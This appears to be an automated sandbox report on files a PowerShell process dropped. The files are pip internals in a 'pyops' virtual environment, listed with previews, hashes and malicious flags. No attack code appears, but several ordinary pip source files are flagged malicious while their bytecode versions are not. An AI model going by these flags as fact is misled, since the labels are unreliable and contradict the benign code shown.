                                                                                                                                                                                                                              Preview:"""Configuration management setup..Some terminology:.- name. As written in config files..- value. Value associated with a name.- key. Name combined with it's section (section.name).- variant. A single word describing where the configuration key-value pair came from."""..import configparser.import locale.import os.import sys.from typing import Any, Dict, Iterable, List, NewType, Optional, Tuple..from pip._internal.exceptions import (. ConfigurationError,. ConfigurationFileCouldNotBeLoaded,.).from pip._internal.utils import appdirs.from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.logging import getLogger.from pip._internal.utils.misc import ensure_dir, enum..RawConfigParser = configparser.RawConfigParser # Shorthand.Kind = NewType("Kind", str)..CONFIG_BASENAME = "pip.ini" if WINDOWS else "pip.conf".ENV_NAMES_IGNORED = "version", "help"..# The kinds of configurations there are..kinds = enum(. USER="user", # User Specific. GLOBAL="global", # System
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):858
                                                                                                                                                                                                                              Entropy (8bit):4.5171574768357425
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1KxkHxgxkEgxkqfx+qGCXnXj/OURH0GyqhC:WgoYP+qGUn77H0mhC
                                                                                                                                                                                                                              MD5:8FBFE6A40E1F2AD53E483516EB995753
                                                                                                                                                                                                                              SHA1:CDA4CA594B1AB236CB2A17FDE09A59D46410CA30
                                                                                                                                                                                                                              SHA-256:1EAEA4B7A8170608CD8ADE614D358B03378234E2A807E374A46612A9E86B962F
                                                                                                                                                                                                                              SHA-512:EF70056BDB3BF241655D58C1C4A4A44D724E0052157A01F54A2584E7AEE978DF1C80B7FC9078CF40AFD842317BC98A328A6AB4FABA89EFAF3D75DA7E23E78EF2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from pip._internal.distributions.base import AbstractDistribution.from pip._internal.distributions.sdist import SourceDistribution.from pip._internal.distributions.wheel import WheelDistribution.from pip._internal.req.req_install import InstallRequirement...def make_distribution_for_install_requirement(. install_req: InstallRequirement,.) -> AbstractDistribution:. """Returns a Distribution for the given InstallRequirement""". # Editable requirements will always be source distributions. They use the. # legacy logic until we create a modern standard for them.. if install_req.editable:. return SourceDistribution(install_req).. # If it's a wheel, it's a WheelDistribution. if install_req.is_wheel:. return WheelDistribution(install_req).. # Otherwise, a SourceDistribution. return SourceDistribution(install_req).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):923
                                                                                                                                                                                                                              Entropy (8bit):5.152848508541705
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:VNfG396S1S3qyMQczKNnAj47rg5xkjxk8BxkBZlx:fGh2qyMQzAzsDXgZlx
                                                                                                                                                                                                                              MD5:FA6E21114B95A68BAFB95F07C4BB8AE7
                                                                                                                                                                                                                              SHA1:8D139179AFC855631464BA5917569774A809AFC6
                                                                                                                                                                                                                              SHA-256:71992BA45773DFFFD25EE42A89C2D56E5AA5E9F6BB2191A60A6E76B1E6960DD2
                                                                                                                                                                                                                              SHA-512:B6844686E8C953B6049AEFEA13005208DBF48AF026C1DB7182FEF275C142660DC4E4B317950E6DC30191425643DCDC0EA2CC768F5639ADAB7DE090F90C93F402
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfZ.........................D.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.f.d...Z.y.)......)...AbstractDistribution)...SourceDistribution)...WheelDistribution)...InstallRequirement..install_req..returnc.....................t.....|.j...................r.t.........|.........S.|.j...................r.t.........|.........S.t.........|.........S.).z7Returns a Distribution for the given InstallRequirement)...editabler......is_wheelr....).r....s.... .UC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/distributions/__init__.py.)make_distribution_for_install_requirementr........s;..................!.+................... ....-..-......k..*..*.....N).. pip._internal.distributions.baser.....!pip._internal.distributions.sdistr.....!pip._internal.distributions.wheelr......pip._internal.req.req_installr....r......r....r......<module>r........s&..........A..@..?..<....+..#....+.......+r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2844
                                                                                                                                                                                                                              Entropy (8bit):5.264408385232684
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:LgzEJmsJJ+yBtCnyuRWAjshg6sH66QmuHVA5WyvzLRvE+qFbU:0zQm3yz5uROhg6X6QmuHS5WA/3F
                                                                                                                                                                                                                              MD5:0042BBCDE8123D289D9E5566BE75E1BD
                                                                                                                                                                                                                              SHA1:FD968E3A02986665B546DCCE8DEDAC592A2AA4B8
                                                                                                                                                                                                                              SHA-256:F9B206C10E22D472B95970CBAB6C455C6C69A9EC824EBEDD9EBA0ED336A24F55
                                                                                                                                                                                                                              SHA-512:DA4289EA3BA50421BC7FA90C3F9F1D2BAF2A0D2D2F9FE3E67918237D1BFA758E11169F79F2E6567EED6361BB7DDA09C2431684252A88816B55C9B34F44F142FE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................h.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.j.............................Z.y.)......N)...Optional)...PackageFinder)...BaseDistribution)...InstallRequirementc............................e.Z.d.Z.d.Z.d.e.d.d.f...f.d...Z.e.j...................d.e.e.....f.d...........Z.e.j...................d.e.f.d...........Z.e.j...................d.e.d.e.d.e.d.d.f.d...........Z...x.Z.S.)...AbstractDistributiona....A base class for handling installable artifacts... The requirements for anything installable are as follows:.. - we must be able to determine the requirement name. (or we can't correctly handle the non-upgrade case)... - for packages with setup requirements, we must also be able. to determine their requirements without installing additional. packages (for the same reason as run-time dependencies).. - we must be able to create a Distribution object exposing the. above metadata... - if
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1682
                                                                                                                                                                                                                              Entropy (8bit):5.206631421373009
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:jcrhet+FH39yn65JeBLdoNaOGErcM+N2fS:4UtMQ0ERoNapBNR
                                                                                                                                                                                                                              MD5:DE8B960D288F1818DA40055E35D96918
                                                                                                                                                                                                                              SHA1:7F654055B54ECE155E28C3CBF0250DAABDC82D93
                                                                                                                                                                                                                              SHA-256:59A9BBF86F215307F1B42FA2D65E96708DDE12F1397D9B7BEE6B1308C85804A3
                                                                                                                                                                                                                              SHA-512:5715B8DD2CC6AFFE2966918C1A084E1704A8628971B7B6428B8811F67B381FAF5EEE2A2C664BD8B25F1024354B63338C9ACCC8C947E5A2EB2DE9F796E0F29774
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfJ.........................J.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.y.)......)...Optional)...AbstractDistribution)...PackageFinder)...BaseDistributionc.....................P.....e.Z.d.Z.d.Z.e.d.e.e.....f.d...........Z.d.e.f.d...Z.d.e.d.e.d.e.d.d.f.d...Z.y.)...InstalledDistributionz.Represents an installed package... This does not need any preparation as the required information has already. been computed.. ..returnc...........................y...N......selfs.... .VC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/distributions/installed.py..build_tracker_idz&InstalledDistribution.build_tracker_id....s..............c.....................h.....|.j...................j.....................J.d...........|.j...................j...................S.).Nz.not actually installed)...req..satisfied_byr....s.... r......get_metadata_distributionz/InstalledDistribution.get_metadata_distribution....s..........x.x..$..$..0..J.2J..J..0....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8470
                                                                                                                                                                                                                              Entropy (8bit):5.189105903663834
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:z7VNLt5nunPV1a1dc8AhSnBRzi88plB44:z7V/+a1+s8plB44
                                                                                                                                                                                                                              MD5:B27A38D12F31317FCC73965B920BCD30
                                                                                                                                                                                                                              SHA1:A111354055929D91D43E3A6568189DB22A3950BF
                                                                                                                                                                                                                              SHA-256:2663FEACCBC2875E13E8E98F87438F748085357B331EDA089CD2923E4DFF112E
                                                                                                                                                                                                                              SHA-512:6DD4479339B1CDC9418F719C1EB66EF36BB4B6C6D4AE930FF10C67EDB9C0AFD1EC73CD8E9B639AE0415961EC3654DBDD2B9A799158528D06D6C69E60C08AEE98
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf5..............................d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j$..................e.........Z...G.d...d.e.........Z.y.)......N)...Iterable..Optional..Set..Tuple)...BuildEnvironment)...AbstractDistribution)...InstallationError)...PackageFinder)...BaseDistribution)...runner_with_spinner_messagec...........................e.Z.d.Z.d.Z.e.d.e.e.....f.d...........Z.d.e.f.d...Z.d.e.d.e.d.e.d.d.f.d...Z.d.e.d.d.f.d...Z.d.e.e.....f.d...Z.d.e.e.....f.d...Z.d.e.d.d.f.d...Z.d.e.d.e.e.e.e.f.........d.d.f.d...Z.d.e.e.....d.d.f.d...Z.y.)...SourceDistributionz.Represents a source distribution... The preparation step for these needs metadata for the packages to be. generated, either using PEP 517 or using the legacy `setup.py egg_info`.. ..returnc.....................r.....|.j...................j...................s.J...|.j...................j...................j...................S.).z/Identify this requir
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2230
                                                                                                                                                                                                                              Entropy (8bit):5.226554449734561
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:+rBet+6PJxRKfMJdqCB6Kf3mYiltlNqB1Yn1/h08n+gde:+UtfJTbJdqxKf3ilLNqfY1/1+gU
                                                                                                                                                                                                                              MD5:FC4C134802CA234F2F5A918D16518F68
                                                                                                                                                                                                                              SHA1:319E4A508692DF6CBA613E9AC654F92203AD89F1
                                                                                                                                                                                                                              SHA-256:3EC00F4B88C42A528205CC11B6483DE4547F4FAA6EFDFF7AE154A8800A6E6D56
                                                                                                                                                                                                                              SHA-512:8CCAB454D75179CEBAF75CEFCAE9F047B9F51F62023628F8DFAA7A694012B3DE092990AC58C2E03B8E74C333128886098E230C8B0B2F887DCF70BFE36C39EEB1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................^.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.....G.d...d.e.........Z.y.)......)...Optional)...canonicalize_name)...AbstractDistribution)...PackageFinder)...BaseDistribution..FilesystemWheel..get_wheel_distributionc.....................P.....e.Z.d.Z.d.Z.e.d.e.e.....f.d...........Z.d.e.f.d...Z.d.e.d.e.d.e.d.d.f.d...Z.y.)...WheelDistributionzqRepresents a wheel distribution... This does not need any preparation as wheels can be directly unpacked.. ..returnc...........................y...N..)...selfs.... .RC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/distributions/wheel.py..build_tracker_idz"WheelDistribution.build_tracker_id....s..............c...........................|.j...................j...................s.J.d...........|.j...................j...................s.J.d...........t.........|.j...................j...........................}.t.........|.t.........|.j...................j...............
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1743
                                                                                                                                                                                                                              Entropy (8bit):4.486954835125386
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:dZmBQDmLumygn9pLpHvWyBGWCDL3ycxWmTSAro+pK1x087CtPQAxPK08sLuJgX1N:dcxEgn9JJ+yBtCnyuS0132gv
                                                                                                                                                                                                                              MD5:CE58C00F9BBC7379E12F84931E2B8E71
                                                                                                                                                                                                                              SHA1:F3C75C6F5615D38AB902A9451E78DE0C263D5D0E
                                                                                                                                                                                                                              SHA-256:A11484BE7BF66630676AB81A9A7BF67DC25AD67EA050329A5B483A096484A56B
                                                                                                                                                                                                                              SHA-512:12EA60FF5695636B9023BD0945F942BA5A74B92DCB6664876E9C32A949A59F5B395EC1E33EE584269490799B7E612517F58636C57F195FE46798628235689491
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import abc.from typing import Optional..from pip._internal.index.package_finder import PackageFinder.from pip._internal.metadata.base import BaseDistribution.from pip._internal.req import InstallRequirement...class AbstractDistribution(metaclass=abc.ABCMeta):. """A base class for handling installable artifacts... The requirements for anything installable are as follows:.. - we must be able to determine the requirement name. (or we can't correctly handle the non-upgrade case)... - for packages with setup requirements, we must also be able. to determine their requirements without installing additional. packages (for the same reason as run-time dependencies).. - we must be able to create a Distribution object exposing the. above metadata... - if we need to do work in the build tracker, we must be able to generate a unique. string to identify the requirement in the build tracker.. """.. def __init__(self, req: InstallRequirement) ->
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):842
                                                                                                                                                                                                                              Entropy (8bit):4.49156758114547
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1REmgxkHxBQDmLuZGKAP39vIA808sLuJgX1O1:ggTxILI39v9n2gQ
                                                                                                                                                                                                                              MD5:38F5423BA5BA35D0628BF5ABD595A207
                                                                                                                                                                                                                              SHA1:D324A8C68F8AE49CFD4FDFAD1B873D947F9FEAC3
                                                                                                                                                                                                                              SHA-256:4229C715B58043CA04D296C3F0C1595A4C259DF5354184DC700D6F9E1AE560E5
                                                                                                                                                                                                                              SHA-512:4EF2282919A2F646B092700A77E899FB8C5F502B8A0F94C67A73E0BCA5D6D8D8CBD0B68A81DB8BA90FAA1D7688AAC1894AEA0B1AE16B56DAF8328A6373BC5880
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Optional..from pip._internal.distributions.base import AbstractDistribution.from pip._internal.index.package_finder import PackageFinder.from pip._internal.metadata import BaseDistribution...class InstalledDistribution(AbstractDistribution):. """Represents an installed package... This does not need any preparation as the required information has already. been computed.. """.. @property. def build_tracker_id(self) -> Optional[str]:. return None.. def get_metadata_distribution(self) -> BaseDistribution:. assert self.req.satisfied_by is not None, "not actually installed". return self.req.satisfied_by.. def prepare_distribution_metadata(. self,. finder: PackageFinder,. build_isolation: bool,. check_build_deps: bool,. ) -> None:. pass.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6709
                                                                                                                                                                                                                              Entropy (8bit):4.410936199070324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:N3lg/ONnP08Mgio/xSPyhIlfJqMmixoAl6qjQLrsg037uzncLF:N36fMhxS6hyoHwoAhuzcLF
                                                                                                                                                                                                                              MD5:B8F63065DB37A243CF91689AFCD18C7E
                                                                                                                                                                                                                              SHA1:59C98DF98387D581B456446983C84B6334C34E4C
                                                                                                                                                                                                                              SHA-256:E0ADD5D1534C9651DB07308989B8F077FB729542A998876ED8043286996F090A
                                                                                                                                                                                                                              SHA-512:4CF6F2CEF5291B033AF9302CAA7D471282182353C68FDC86838B70A1D15A3CF954927445E5219596E86390D399AEFF8D0DFA1821A9015EDF5ABAC619AD52D5EC
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import logging.from typing import Iterable, Optional, Set, Tuple..from pip._internal.build_env import BuildEnvironment.from pip._internal.distributions.base import AbstractDistribution.from pip._internal.exceptions import InstallationError.from pip._internal.index.package_finder import PackageFinder.from pip._internal.metadata import BaseDistribution.from pip._internal.utils.subprocess import runner_with_spinner_message..logger = logging.getLogger(__name__)...class SourceDistribution(AbstractDistribution):. """Represents a source distribution... The preparation step for these needs metadata for the packages to be. generated, either using PEP 517 or using the legacy `setup.py egg_info`.. """.. @property. def build_tracker_id(self) -> Optional[str]:. """Identify this requirement uniquely by its link.""". assert self.req.link. return self.req.link.url_without_fragment.. def get_metadata_distribution(self) -> BaseDistribution:. return self.r
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1277
                                                                                                                                                                                                                              Entropy (8bit):4.5243107043852495
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1REmd+bzbgxkHxBQDmLuZyHTF3PJxgTIA/JdqZF2vB6KQcdF5WzWzocnP08sLuJD:eugTxIyHx3PJxo9/JdqCB6K76zoS2gQ
                                                                                                                                                                                                                              MD5:0425F2280265E3BFDD6477C6D024CD45
                                                                                                                                                                                                                              SHA1:BE6A4C3D87575E02D0C974F527F84D8D390FC291
                                                                                                                                                                                                                              SHA-256:FA66B7B0EB54423D00C570846FAFC58668E5DE78789370341C2DAD6806F637EE
                                                                                                                                                                                                                              SHA-512:7C8792C6D23A47CC15EC9F2698E8C3E68026541065FE9189BB917E2EB318AC106C4F67AE2A590874DCE59808A9E29A8AEA11D65F5CD63C59134A6C781417F961
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Optional..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.distributions.base import AbstractDistribution.from pip._internal.index.package_finder import PackageFinder.from pip._internal.metadata import (. BaseDistribution,. FilesystemWheel,. get_wheel_distribution,.)...class WheelDistribution(AbstractDistribution):. """Represents a wheel distribution... This does not need any preparation as wheels can be directly unpacked.. """.. @property. def build_tracker_id(self) -> Optional[str]:. return None.. def get_metadata_distribution(self) -> BaseDistribution:. """Loads the metadata from the wheel file into memory and returns a. Distribution that uses it, not relying on the wheel file or. requirement.. """. assert self.req.local_file_path, "Set as part of preparation during download". assert self.req.name, "Wheels are never unnamed". wheel = FilesystemWheel(self
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):23634
                                                                                                                                                                                                                              Entropy (8bit):4.53561867510731
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:hBsLadMV45Sv81NiYkrkqKejbUOaUOvb0LgxacbjV3Z8ZGsGYo16yAOY2rJil4Dw:hIaOVa9OYw9KejCYLxGY/JJ2rYaUcG
                                                                                                                                                                                                                              MD5:2875C65A033D41186AE8907B53B53FAA
                                                                                                                                                                                                                              SHA1:AF908E2721537D4F92A2E084E4DC8507C8BDF418
                                                                                                                                                                                                                              SHA-256:4E617588D1449DE49669E9B0960E9AE5BA4FBAAD9C3072BB775F92BE3B101DBD
                                                                                                                                                                                                                              SHA-512:AB8F1BCCE1E1C068413C58817575CA0BDC3200B66B236CC5595A7E4533E5F9509182CA3EF4D76B622EC59293D550FAA4A468E12BC55EADD138EB57F1F4B7EF1F
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""Exceptions used throughout package...This module MUST NOT try to import from anything within `pip._internal` to.operate. This is expected to be importable from any/all files within the.subpackage and, thus, should not depend on them.."""..import configparser.import contextlib.import locale.import logging.import pathlib.import re.import sys.from itertools import chain, groupby, repeat.from typing import TYPE_CHECKING, Dict, Iterator, List, Optional, Union..from pip._vendor.requests.models import Request, Response.from pip._vendor.rich.console import Console, ConsoleOptions, RenderResult.from pip._vendor.rich.markup import escape.from pip._vendor.rich.text import Text..if TYPE_CHECKING:. from hashlib import _Hash. from typing import Literal.. from pip._internal.metadata import BaseDistribution. from pip._internal.req.req_install import InstallRequirement..logger = logging.getLogger(__name__)...#.# Scaffolding.#.def _is_kebab_case(s: str) -> bool:. return re.match(r"^[a-
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):30
                                                                                                                                                                                                                              Entropy (8bit):3.606238928653389
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:K2H1LLlAvnHv:Ku1LQ
                                                                                                                                                                                                                              MD5:8B1D3A4A3D674CF9F227B7DCBE69552B
                                                                                                                                                                                                                              SHA1:A55D1D416E674D9F4A8E0337DEFE350962F21F1A
                                                                                                                                                                                                                              SHA-256:BE9B7E25E4D979F87C6BE142DB665E0525C555BB817174868882E141925A3694
                                                                                                                                                                                                                              SHA-512:9E4B87724025EFBE758FB8FA370EB02274F2675D3C3C00713FF06C75B55F7005CFBE51195FD309073999C12AFB12E1BBCE5D3339D283C0602B739AEEC6307826
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""Index interaction code.""".
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):214
                                                                                                                                                                                                                              Entropy (8bit):4.9758866073673955
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:+l/aCCps1I1L+36B0Wlt6uw52KNdAreKAnc6IaYleHXlll:a/aCC8IY36BvP6cKNnbcjaYkH1ll
                                                                                                                                                                                                                              MD5:240F1B57F3356E6204050FB251BFF541
                                                                                                                                                                                                                              SHA1:D57976C923950A39E4215C4CB68701CFD414F87A
                                                                                                                                                                                                                              SHA-256:3EC3CB55C54A76837EC37177CCFD4F40ADD3E98D34A7F147C099E033DE833C84
                                                                                                                                                                                                                              SHA-512:69CF9C724F87218BF292B17A0C151D994107347B13F5A5A7F1F6BC45572BF158CE79707A45B54F80E17B00301103295664D39E6F0F26C1CF02C96D8067EF543D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.Z.y.).z.Index interaction code.N)...__doc__........MC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/index/__init__.py..<module>r........s..............r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21868
                                                                                                                                                                                                                              Entropy (8bit):5.376207815692933
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:WknT9pMizSWWxWcZxEVuRglCex4kKVjm9y:WknT9EWWxWcZxEECQex4kKVX
                                                                                                                                                                                                                              MD5:BB7AFA7571869E18DF31813D2EF5B0FA
                                                                                                                                                                                                                              SHA1:85D0F327C361666EC77119B683B9819C0C6C0C44
                                                                                                                                                                                                                              SHA-256:2B13D84D003FA5549791BE7EA131FC51DB1F20B3ED9F6A0701DE0F13B1BAF71F
                                                                                                                                                                                                                              SHA-512:FADF5ACC239E872090BA41B796732CB5E0EDCD2347004AAED9C7827C3496D1958BBFAEBA9A50BDB29F3F5062CD01B30BA0E1D03EBD3A984A1A9DC99296098C38
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.@........................".....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!m"Z"..d.d.l#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/m0Z0..d.d.l1m2Z2..d.d.l3m4Z4m5Z5m6Z6..e.r.d.d.l.m7Z7..n.e8Z7..e.jr..................e:........Z;e.e<e<f.....Z=d.e<d.e.e<....f.d...Z>..G.d...d.e?........Z@d.e.d.d.f.d...ZA..G.d...d.e?........ZBd.e<d.e*d.d.f.d...ZCd.e<d.e*d.e.f.d...ZDd e=d.e.e<....f.d!..ZE..G.d"..d#........ZF..G.d$..d%e7........ZGd&eGd.eGf.d'..ZHeHd(d)d.e.e&....f.d*..........ZI..G.d+..d)........ZJ..G.d,..d-e.........ZK..d:d.e&d/e.e<e?f.....d0e.e.d1........d.d.f.d2..ZL..d;d.e.d3eMd.eJf.d4..ZNd.e&d.e*d.e.d)....f.d5..ZO..G.d6..d7e.........ZP..G.d8..d9........ZQy.)<zO.The main purpose of this module is to expose LinkCollector.collect_sources().......N)...HTMLParser)...Values)...TYPE_CHECKING..Callable..Dict..Iterable
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):40717
                                                                                                                                                                                                                              Entropy (8bit):5.479481722601336
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:6cBbOYgAh24peYkIKbiTemW4ufoQwXMVJXtNeeMrGOH:JBiZAh24pePtbiHBUHwXAlt5gGq
                                                                                                                                                                                                                              MD5:76A3C87F62A730F44C942EF9E115FA1F
                                                                                                                                                                                                                              SHA1:0FF1240EE059FF810522301CEA04492EE73FA76D
                                                                                                                                                                                                                              SHA-256:1A964251767EA272B904489FC9C459CE2251F0EBF2FE5D2C98ED8ACDF5E4C403
                                                                                                                                                                                                                              SHA-512:5E531DDA365BFEA0B0E6BF18332F639199458AA875E339622AF20FCD230B61D4DDA8A47DF963CE9B3303EC3D4EFEBC684F017CC430B2343D1849586B6136C3F7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m Z ..d.d.l!m"Z"..d.d.l#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/m0Z0..d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:..d.d.l;m<Z<..d.d.l=m>Z>..e.r.d.d.l?m@Z@..g.d...ZA..e2eB........ZCe.e.d.....e.eDeEf.....f.....ZFe.eDeDeDe.e.eD....eFf.....ZG..d6d.e&d.e.eDeDeDf.....d.eHd eHf.d!..ZI..G.d"..d#e.j...........................ZK..G.d$..d%........ZLd&e.e"....d'e.e6....d(eEd e.e"....f.d)..ZM..G.d*..d+........ZN..G.d,..d-........ZO..G.d...d/........ZP..G.d0..d1........ZQd2eEd3eEd eDf.d4..ZRd2eEd3eEd e.eE....f.d5..ZSy.)7z!Routines related to PyPI, indexes.....N)...TYPE_CHECKING..FrozenSet..Iterable..List..Optional..Set..Tuple..Union)...specifiers)...Tag)...canonicalize_name)..._BaseVersion)...parse)...BestVersionAlreadyInstalled..Distri
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12586
                                                                                                                                                                                                                              Entropy (8bit):5.258341822950925
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:3WPTo/VC4rbEjyWoXqW4/t+n3cLw9/TJMjTxyyDfflr6U:IWY4rioXl4gr9/Tq5yyDlT
                                                                                                                                                                                                                              MD5:6A6E9DDE8E0E8E4B1E6BAB6B660D04FD
                                                                                                                                                                                                                              SHA1:C496FA8734C5DFF0A43488D99DA5963CAF62EFFB
                                                                                                                                                                                                                              SHA-256:AE5DB93BF091FFAB5D94FCAC8FA2C706F07F5DEE7A9B48A49292E99A47B3FF13
                                                                                                                                                                                                                              SHA-512:63FE2F6BD6B9CD0FDBF1A23349BBC5DAF8ED4179E68CF160570B643A4D48D526F0BEBDA600FEF43794EAE9073F77453BB9A6B4CCE190691081DD5EF382085ED6
                                                                                                                                                                                                                              Malicious:false
